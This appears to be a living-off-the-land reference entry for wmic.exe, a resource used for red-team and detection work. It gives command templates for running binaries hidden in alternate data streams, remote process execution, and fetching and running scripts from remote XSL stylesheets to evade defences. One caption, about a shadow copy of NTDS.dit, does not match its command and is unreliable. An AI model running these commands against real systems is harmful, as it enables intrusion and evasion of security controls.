.. /Wmic.exe
Star

Alternate data streams (EXE)
Execute (CMD, Remote, XSL)
Copy

The WMI command-line (WMIC) utility provides a command-line interface for WMI

Paths:

Resources:

Acknowledgements:

Detections:

Alternate data streams

  1. Execute a .EXE file stored as an Alternate Data Stream (ADS)

    wmic.exe process call create "{PATH_ABSOLUTE}:program.exe"
    Use case

    Execute binary file hidden in Alternate data streams to evade defensive counter measures

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1564.004
    Tags
    Execute: EXE

Execute

  1. Execute calc from wmic

    wmic.exe process call create "{CMD}"
    Use case

    Execute binary from wmic to evade defensive counter measures

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Execute: CMD
  2. Execute evil.exe on the remote system.

    wmic.exe /node:"192.168.0.1" process call create "{CMD}"
    Use case

    Execute binary on a remote system

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Execute: CMD
    Execute: Remote
  3. Create a volume shadow copy of NTDS.dit that can be copied.

    wmic.exe process get brief /format:"{REMOTEURL:.xsl}"
    Use case

    Execute binary on remote system

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Execute: XSL
    Execute: Remote
  4. Executes JScript or VBScript embedded in the target remote XSL stylsheet.

    wmic.exe process get brief /format:"{PATH_SMB:.xsl}"
    Use case

    Execute script from remote system

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Execute: XSL
    Execute: Remote

Copy

  1. Copy file from source to destination.

    wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
    Use case

    Copy file.

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1105